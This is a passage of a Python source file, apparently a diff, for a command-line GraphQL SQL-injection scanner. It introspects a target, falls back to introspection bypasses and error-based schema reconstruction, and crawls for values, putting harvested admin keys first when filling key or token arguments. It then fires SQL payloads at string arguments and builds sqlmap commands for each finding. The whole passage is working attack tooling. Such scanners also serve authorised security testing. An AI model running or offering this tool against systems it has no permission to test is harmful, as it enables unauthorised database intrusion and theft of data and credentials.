--skip-urlencode --parse-errors --random-agent") + +def check_sql_error_in_response(resp_data: Dict[str, Any]) -> Optional[Dict[str, str]]: + """Check for SQL error signatures in the GraphQL errors array and in data string values. + + Some backends leak SQL errors inside the data payload rather than the errors array. + """ + if not resp_data: + return None + + # Primary: GraphQL errors array + for e in (resp_data.get("errors") or []): + msg = str(e.get("message", "")) + for rx in SQL_ERROR_SIGS: + if rx.search(msg): + return {"evidence": msg, "pattern": rx.pattern} + + # Secondary: string values in the data field + data = resp_data.get("data") + if isinstance(data, dict): + for v in data.values(): + if isinstance(v, str): + for rx in SQL_ERROR_SIGS: + if rx.search(v): + return {"evidence": v, "pattern": rx.pattern} + + return None + +def detect_missing_required_arg(resp_data: Dict[str, Any]) -> Optional[str]: + if not resp_data: + return None + for e in (resp_data.get("errors") or []): + msg = str(e.get("message", "")) + m = re.search(r'argument\s+"([^"]+)"[^.]*required but not provided', msg, re.I) + if m: + return m.group(1) + return None + +def detect_graphql_syntax_error(resp_data: Dict[str, Any]) -> Optional[str]: + if not resp_data: + return None + for e in (resp_data.get("errors") or []): + msg = str(e.get("message", "")) + if re.search(r"Syntax Error GraphQL|Syntax Error|Unexpected character|Expected :, found", msg, re.I): + return msg + return None + +def compute_confidence(evidence_type: str, payload: str, has_repro: bool) -> float: + weights = { + "SQL_ERROR": 0.6, + "SQL_ERROR_IN_RESPONSE": 0.6, + "SQL_ERROR_IN_RESPONSE_SIMPLE": 0.6, + "RESPONSE_DIFF": 0.2, + "RESPONSE_DIFF_SIMPLE": 0.1, + "NULL_ON_ATTACK": 0.15, + } + base = weights.get(evidence_type, 0.1) + payload_bonus = 0.1 if payload and re.search(r"(\bOR\b|\bUNION\b|--|/\*|')", payload, re.I) else 0.0 + score = min(base + payload_bonus + (0.15 if has_repro else 0.0), 0.99) + return round(score, 2) + +# -------------------- Main detection logic -------------------------------- + +def run_detector(endpoint: str, headers: Dict[str, str], crawl: bool = False, + crawl_depth: int = 2, max_requests: int = 250, max_items: int = 10, + crawl_delay: float = 0.0, verbose: bool = False) -> List[Dict[str, Any]]: + + print(Fore.CYAN + f"[*] Running introspection on {endpoint}") + + # Use core introspection with automatic newline-bypass fallback + _intro_headers = {"Content-Type": "application/json"} + _intro_headers.update(headers or {}) + intro_data, strategy = core_intro.fetch_with_bypass(endpoint, _intro_headers, TIMEOUT) + if intro_data is None: + discovered = core_intro.find_graphql_endpoint(endpoint, _intro_headers, TIMEOUT) + if discovered and discovered != endpoint: + print(Fore.YELLOW + f"[!] Auto-discovered endpoint: {discovered}") + endpoint = discovered + intro_data, strategy = core_intro.fetch_with_bypass(endpoint, _intro_headers, TIMEOUT) + if intro_data is None: + print(Fore.YELLOW + "[!] All introspection strategies failed — attempting error-based reconstruction...") + intro_data = core_intro.reconstruct_schema_from_errors(endpoint, _intro_headers, TIMEOUT, verbose=verbose) + if intro_data is None: + print(Fore.RED + "[!] Could not obtain schema.") + return [] + strategy = "error-reconstruction" + if strategy and strategy != "normal": + print(Fore.YELLOW + f"[!] Introspection strategy used: {strategy}") + + schema = core_intro.extract_schema(intro_data) + if not schema: + print(Fore.RED + "[!] Could not extract '__schema' from introspection response.") + return [] + + types: List[Dict[str, Any]] = schema.get("types") or [] + type_map = _build_type_map(types) + + # Resolve the actual query type name — don't assume it's called "Query" + query_type_name = (schema.get("queryType") or {}).get("name") or "Query" + query_type = type_map.get(query_type_name) + if not query_type or not query_type.get("fields"): + print(Fore.RED + f"[!] Query type '{query_type_name}' not found in schema or has no fields.") + return [] + + query_fields: List[Dict[str, Any]] = query_type.get("fields", []) + + crawl_params = dict( + max_depth=crawl_depth if crawl else 1, + max_requests=max_requests if crawl else 50, + max_items_per_list=max_items, + delay=crawl_delay, + verbose=verbose, + ) + extracted_values, key_roles = crawl_and_extract_values( + endpoint, headers, query_fields, types, **crawl_params + ) + + admin_keys = [k for k, r in key_roles.items() if isinstance(r, str) and 'admin' in r.lower()] + if admin_keys: + print(Fore.GREEN + f"[+] Prioritizing {len(admin_keys)} admin key(s) when filling key-like arguments") + + temp_findings: Dict[Tuple[str, str], List[Dict[str, Any]]] = {} + + for field in query_fields: + args = field.get("args") or [] + if not args: + continue + field_name = field.get("name") + if not field_name or field_name.startswith("__"): + continue + + string_args = [a for a in args if is_string_type(extract_named_type(a.get("type")))] + if not string_args: + continue + + return_type_name = extract_named_type(field.get("type")) + return_type_def = type_map.get(return_type_name) + selection = pick_scalar_field_for_type(return_type_def, type_map) + if not selection and return_type_def and return_type_def.get("fields"): + fallback = next( + (f for f in return_type_def["fields"] if f["name"] in ("id", "uuid", "username", "name", "title", "__typename")), + None + ) + if fallback: + selection = fallback["name"] + if not selection: + selection = "__typename" + + base_values: Dict[str, List[str]] = {} + for arg in args: + an = arg.get("name") + ev = list(extracted_values.get(an, []))[:8] + if an and any(k in an.lower() for k in ("key", "apikey", "token")) and admin_keys: + deduped: List[str] = [] + for k in admin_keys: + if k not in deduped: + deduped.append(k) + for v in ev: + if v not in deduped: + deduped.append(v) + ev = deduped[:8] + if verbose: + print(Fore.YELLOW + f"[>] Using prioritized admin keys for argument '{an}': {ev[:3]}") + if not ev: + ev = simple_name_match_values(an, extracted_values) + base_values[an] = ev if ev else ( + ["test", "admin", "test123"] if is_string_type(extract_named_type(arg.get("type"))) else ["1", "100"] + ) + + for target_arg in string_args: + target_arg_name = target_arg.get("name") + + other_args = [a.get("name") for a in args if a.get("name") != target_arg_name] + candidate_lists = [ + sorted(base_values.get(oname, ["test"]), key=lambda x: len(str(x)), reverse=True)[:3] + for oname in other_args + ] + + combos_to_try: List[Dict[str, str]] = [] + if candidate_lists: + for combo in product(*candidate_lists): + args_dict = {other_args[i]: combo[i] for i in range(len(other_args))} + args_dict[target_arg_name] = "test" + combos_to_try.append(args_dict) + if len(combos_to_try) >= 6: + break + else: + combos_to_try.append({target_arg_name: "test"}) + + working_args: Optional[Dict[str, str]] = None + base_resp = None + base_norm = None + base_has_error = True + for attempt_args in combos_to_try: + base_q = build_query(field_name, attempt_args, selection).get("query", "") + base_resp = post_graphql(endpoint, headers, {"query": base_q}, verbose=verbose) + base_norm = normalize_resp(base_resp.get("data")) + base_has_error = bool(base_resp.get("data", {}).get("errors")) + if not base_has_error: + working_args = attempt_args.copy() + print(Fore.GREEN + Style.DIM + f"[+] Baseline for {field_name}.{target_arg_name} works with args: {attempt_args}") + break + + if not working_args: + working_args = combos_to_try[0].copy() if combos_to_try else {target_arg_name: "test"} + print(Fore.YELLOW + Style.DIM + f"[!] No clean baseline found for {field_name}.{target_arg_name}, using best-effort baseline: {working_args}") + + simple_q_base_str = build_query(field_name, {**working_args, target_arg_name: "test"}, "__typename").get("query", "") + simple_base_resp = post_graphql(endpoint, headers, {"query": simple_q_base_str}, verbose=verbose) + simple_base_norm = normalize_resp(simple_base_resp.get("data")) + simple_field_value = get_field_from_response(simple_base_resp.get("data"), field_name) + + key = (field_name, target_arg_name) + temp_findings.setdefault(key, []) + + # --- Primary payload loop (with working context args) --- + for payload in PAYLOADS: + attack_args = {**working_args, target_arg_name: payload} + attack_q_str = build_query(field_name, attack_args, selection).get("query", "") + attack_resp = post_graphql(endpoint, headers, {"query": attack_q_str}, verbose=verbose) + + if detect_graphql_syntax_error(attack_resp.get("data")): + continue + + missing_arg = detect_missing_required_arg(attack_resp.get("data")) + if missing_arg: + candidate = (base_values.get(missing_arg) or [None])[0] or \ + (simple_name_match_values(missing_arg, extracted_values) or [None])[0] + if candidate: + attack_args[missing_arg] = candidate + attack_q_str = build_query(field_name, attack_args, selection).get("query", "") + attack_resp = post_graphql(endpoint, headers, {"query": attack_q_str}, verbose=verbose) + if detect_graphql_syntax_error(attack_resp.get("data")): + continue + else: + continue + + sql_err = check_sql_error_in_response(attack_resp.get("data")) + attack_norm = normalize_resp(attack_resp.get("data")) + + if sql_err: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "SQL_ERROR", sql_err.get("evidence")) + temp_findings[key].append({ + "field": field_name, "arg": target_arg_name, "payload": payload, + "args_used": attack_args.copy(), "type": "SQL_ERROR", + "evidence": sql_err["evidence"], + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": _build_sqlmap_cmd_marker(marker_path), + "repro": marker_path, + }) + continue + + if base_norm and attack_norm and base_norm != attack_norm and not base_has_error: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "RESPONSE_DIFF", "Baseline != Attack") + temp_findings[key].append({ + "field": field_name, "arg": target_arg_name, "payload": payload, + "args_used": attack_args.copy(), "type": "RESPONSE_DIFF", + "evidence": "Baseline != Attack", + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": _build_sqlmap_cmd_marker(marker_path), + "repro": marker_path, + }) + continue + + # Compare actual field values, not JSON-serialized strings + base_field_val = get_field_from_response(base_resp.get("data") if base_resp else None, field_name) + attack_field_val = get_field_from_response(attack_resp.get("data"), field_name) + if base_field_val not in (None, {}, []) and attack_field_val in (None, {}, []) and not base_has_error: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "NULL_ON_ATTACK", "Null returned on attack while baseline had data") + temp_findings[key].append({ + "field": field_name, "arg": target_arg_name, "payload": payload, + "args_used": attack_args.copy(), "type": "NULL_ON_ATTACK", + "evidence": "Null returned on attack while baseline had data", + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": _build_sqlmap_cmd_marker(marker_path), + "repro": marker_path, + }) + continue + + if simple_field_value not in (None, {}, []) and simple_base_norm and attack_norm and simple_base_norm != attack_norm: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "RESPONSE_DIFF_SIMPLE", "Simple baseline __typename differs from attack") + temp_findings[key].append({ + "field": field_name, "arg": target_arg_name, "payload": payload, + "args_used": attack_args.copy(), "type": "RESPONSE_DIFF_SIMPLE", + "evidence": "Simple baseline __typename differs from attack", + "base_response": simple_base_resp.get("data"), + "attack_response": attack_resp.get("data"), + "recommended_cmd": _build_sqlmap_cmd_marker(marker_path), + "repro": marker_path, + }) + continue + + # --- Fallback simple loop (target arg only, __typename selection) --- + # Skip if the primary loop already produced SQL error evidence — no benefit. + _already_has_sql_err = any(i.get("type", "").startswith("SQL_ERROR") for i in temp_findings[key]) + if not _already_has_sql_err: + for payload in PAYLOADS: + simple_atk_args = {target_arg_name: payload} + simple_atk_q_str = build_query(field_name, simple_atk_args, "__typename").get("query", "") + simple_atk_resp = post_graphql(endpoint, headers, {"query": simple_atk_q_str}, verbose=verbose) + + missing_arg = detect_missing_required_arg(simple_atk_resp.get("data")) + if missing_arg: + candidate = (base_values.get(missing_arg) or [None])[0] or \ + (simple_name_match_values(missing_arg, extracted_values) or [None])[0] + if candidate: + simple_atk_args[missing_arg] = candidate + simple_atk_q_str = build_query(field_name, simple_atk_args, "__typename").get("query", "") + simple_atk_resp = post_graphql(endpoint, headers, {"query": simple_atk_q_str}, verbose=verbose) + else: + continue + + if detect_graphql_syntax_error(simple_atk_resp.get("data")): + continue + + sa_norm = normalize_resp(simple_atk_resp.get("data")) + sa_err = check_sql_error_in_response(simple_atk_resp.get("data")) + + if sa_err: + marker_path = write_or_update_marker( + endpoint, headers, simple_atk_q_str, field_name, target_arg_name, + payload, {}, "SQL_ERROR", sa_err.get("evidence")) + temp_findings[key].append({ + "field": field_name, "arg": target_arg_name, "payload": payload, + "args_used": {target_arg_name: payload}, + "type": "SQL_ERROR_IN_RESPONSE_SIMPLE", + "evidence": sa_err["evidence"], + "base_response": simple_base_resp.get("data"), + "attack_response": simple_atk_resp.get("data"), + "recommended_cmd": _build_sqlmap_cmd_marker(marker_path), + "repro": marker_path, + }) + break + + if simple_field_value not in (None, {}, []) and simple_base_norm and sa_norm and simple_base_norm != sa_norm: + marker_path = write_or_update_marker( + endpoint, headers, simple_atk_q_str, field_name, target_arg_name, + payload, {}, "RESPONSE_DIFF_SIMPLE", + "Simple baseline __typename differs from attack") + temp_findings[key].append({ + "field": field_name, "arg": target_arg_name, "payload": payload, + "args_used": {target_arg_name: payload}, + "type": "RESPONSE_DIFF_SIMPLE", + "evidence": "Simple baseline __typename differs from attack", + "base_response": simple_base_resp.get("data"), + "attack_response": simple_atk_resp.get("data"), + "recommended_cmd": _build_sqlmap_cmd_marker(marker_path), + "repro": marker_path, + }) + break + + # --- Confirmation rules (reduce false positives before returning) --- + final_findings: List[Dict[str, Any]] = [] + for (field_name, arg_name), items in temp_findings.items(): + # Discard if every attack response returned null AND there are no SQL errors + all_attack_null = True + for it in items: + atk = it.get("attack_response") + val = None + if isinstance(atk, dict): + try: + val = (atk.get("data") or {}).get(field_name) if isinstance(atk.get("data"), dict) else atk.get(field_name) + except Exception: + pass + if val not in (None, {}, []): + all_attack_null = False + break + elif not isinstance(atk, dict): + all_attack_null = False + break + if all_attack_null and not any(i.get("type", "").startswith("SQL_ERROR") for i in items): + continue + + types_present = {i.get("type") for i in items} + payloads_present = {i.get("payload") for i in items} + has_sql_err = any(i.get("type", "").startswith("SQL_ERROR") for i in items) + has_null = any(i.get("type") == "NULL_ON_ATTACK" for i in items) + + if has_sql_err: + final_findings.extend(i for i in items if i.get("type", "").startswith("SQL_ERROR")) + elif len(payloads_present) >= 2: + seen_p: Set = set() + for i in items: + p = i.get("payload") + if p not in seen_p: + final_findings.append(i) + seen_p.add(p) + elif has_null: + final_findings.extend(i for i in items if i.get("type") == "NULL_ON_ATTACK") + elif "RESPONSE_DIFF" in types_present and "RESPONSE_DIFF_SIMPLE" in types_present: + rep = next((i for i in items if i.get("type") in ("RESPONSE_DIFF", "RESPONSE_DIFF_SIMPLE")), None) + if rep: + final_findings.append(rep) + + return final_findings + +# -------------------- CLI / main ------------------------------------------ + +def main(): + parser = argparse.ArgumentParser( + description="GraphQL SQLi detector — tests string arguments with SQL payloads", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=( + "Examples:\n" + " python3 sqli/sqli_detector.py https://target.com/graphql\n" + " python3 sqli/sqli_detector.py https://target.com/graphql " + "'{\"Authorization\":\"Bearer TOKEN\"}'\n" + " python3 sqli/sqli_detector.py https://target.com/graphql --crawl --verbose\n" + ), + ) + parser.add_argument("endpoint", help="GraphQL endpoint URL") + parser.add_argument("headers", nargs="?", default=None, + help="Optional headers as JSON object or 'Name: Value' pairs") + parser.add_argument("--crawl", action="store_true", + help="BFS crawl to extract values for smarter argument seeding (opt-in)") + parser.add_argument("--crawl-depth", type=int, default=2, + help="Max crawl depth (default: 2)") + parser.add_argument("--max-requests", type=int, default=250, + help="Max requests during crawl (default: 250)") + parser.add_argument("--max-items", type=int, default=10, + help="Items per list to inspect during crawl (default: 10)") + parser.add_argument("--crawl-delay", type=float, default=0.0, + help="Delay between crawl requests in seconds (default: 0.0)") + parser.add_argument("--verbose", action="store_true", + help="Print queries and debug information") + args = parser.parse_args() + + if args.crawl_depth < 1: + print("[!] --crawl-depth must be >= 1", file=sys.stderr) + sys.exit(1) + if args.max_requests < 1: + print("[!] --max-requests must be >= 1", file=sys.stderr) + sys.exit(1) + if args.max_items < 1: + print("[!] --max-items must be >= 1", file=sys.stderr) + sys.exit(1) + if args.crawl_delay < 0: + print("[!] --crawl-delay must be >= 0", file=sys.stderr) + sys.exit(1) + + headers = parse_headers_input(args.headers) + findings = run_detector( + args.endpoint, headers, + crawl=args.crawl, + crawl_depth=args.crawl_depth, + max_requests=args.max_requests, + max_items=args.max_items, + crawl_delay=args.crawl_delay, + verbose=args.verbose, + ) + + grouped = group_findings_by_param(findings, args.endpoint) + print_grouped_summary(grouped) + +if __name__ == "__main__": + main()